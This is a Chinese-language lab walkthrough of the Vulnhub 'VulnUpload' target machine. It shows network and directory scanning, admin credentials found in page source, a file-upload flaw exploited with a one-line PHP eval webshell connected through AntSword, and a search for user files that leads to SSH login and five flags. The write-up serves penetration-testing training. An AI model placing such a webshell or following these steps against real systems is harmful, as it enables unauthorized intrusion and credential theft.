前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Vulnhub-VulnUpload靶机渗透实战

Vulnhub-VulnUpload靶机渗透实战

作者头像
网络安全自修室
发布2024-03-18 14:56:46
1200
发布2024-03-18 14:56:46
举报
1

免责声明

本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。

2

内容速览


前言

这是网络安全自修室每周带星球小伙伴一起实战的第12台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知!

靶机可从Vulnhub平台 免费下载,并通过虚拟机在本地搭建,渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标!

攻击机:Kali Linux

靶机环境:Linux-VulnUpload

所用工具:nmap | Burpsuite | 蚁剑

0x00 知识点

  • robots.txt 扫描
  • 蚁剑基础连接使用
  • 隐藏文件查找

0x01靶机搭建

首先从上面地址中下载好靶机,并直接解压导入虚拟机后,将该虚拟机的网路设为NAT模式。之后打开虚拟机,进入到开机界面。(这里一定要迅速把鼠标点进去,之后快速摁向下方向键,否则,会自动帮你进入第一个。)

跟着步骤走。。。

选择进入root模式。。。之后就到了考验命令行的时候了。

先输入:mount -o rw,remount /

之后再输入

代码语言:javascript
复制
ifconfig -a

查看你的网卡名称,并记住哦,以后用的到。。

使用vim编辑器,去修改/etc/network/interfaces 文件中的数据(如图输入)

将这里改成你刚刚看到的网卡名称(我的图就是已经改完的了哈。)

之后保存退出,w是保存,q是退出,wq是保存并退出

并且每个命令如果后面加!的话就是强制执行

之后,你的环境就搭建好了,重启如下为正常启动后的画面

0x02 信息搜集

端口发现

代码语言:javascript
复制
arp-scan -l

扫描网段

这里发现靶机的IP地址为192.168.15.128,攻击机kali的IP地址为192.168.15.131

使用nmap进行深度的扫描

代码语言:javascript
复制
nmap -A -T4 -p- 192.168.15.128

综上信息搜集可以发现,目标服务器为Linux系统,开放了ssh 22端口,http 80端口,重点考虑从web页面找寻突破口

0x03 获取Flag

第一个flag

这里发现靶机开放了ssh 22端口,http 80端口。并在robots.txt中,发现疑似flag。

我们尝试浏览器输入 http://192.168.15.128/flag 去访问

发现flag1:{8734509128730458630012095}

第二个flag

接下来我们尝试使用dirsearch扫描一下网页目录

代码语言:javascript
复制
dirsearch -u 192.168.15.128

http://192.168.15.128/admin_area/

http://192.168.15.128/assets/

http://192.168.15.128/css/

在浏览器中访问http://192.168.15.128/admin_area/,F12发现了admin用户以及其密码:3v1l_H@ck3r。

发现flag2:{7412574125871236547895214}

第三个flag

浏览器访问http://192.168.15.128 ,使用刚才得到的admin用户及密码3v1l_H@ck3r尝试登录。

成功进入后发现是可以上传文件的页面,可以尝试是否存在文件上传漏洞

写入一句话木马到文件中

代码语言:javascript
复制
<?php eval($_REQUEST[password]); ?>

使用中国蚁剑进行连接

连接成功,说明存在文件上传漏洞

查看hint.txt文件,发现flag3以及提示查找用户technawi

发现flag3:{7645110034526579012345670}

第四个flag

刚才在第三个flag提示我们用technawi去读取flag.txt文件,可以在隐藏文件中找到用户的信息

代码语言:javascript
复制
try to find user technawi password to read the flag.txt file, you can find it in a hidden file

蚁剑打开虚拟终端,查找用户信息,2>/dev/null是过滤掉类似没有权限的信息

代码语言:javascript
复制
find / -user 'technawi' 2>/dev/null

此时我们看到了一个特殊的文件/etc/mysql/conf.d/credentials.txt ,我们尝试去读一下里面的信息,得到flag4以及username和password

发现flag4:{7845658974123568974185412}

第五个flag

根据flag3的提示,我们登录technawi用户直接查看/var/www/html/flag.txt

代码语言:javascript
复制
ssh technawi@192.168.15.128
cat /var/www/html/flag.txt

发现flag5:{5473215946785213456975249}

0x04 总结

此靶机一共找到了5个flag,难度不大,但是流程全面,分别通过端口扫描、网站目录扫描得到账密成功登录网站,并通过发现文件上传漏洞,利用一句话木马传到靶机,再通过蚁剑进行连接,最后查找并登录technawi用户查看隐藏文件flag.txt得到全部flag,完成该靶机可以熟悉掌握渗透的初步流程。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2024-03-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全自修室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 0x00 知识点
  • 0x01靶机搭建
  • 0x02 信息搜集
    • 端口发现
      • 第一个flag
      • 第二个flag
      • 第三个flag
      • 第四个flag
      • 第五个flag
  • 0x03 获取Flag
  • 0x04 总结
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档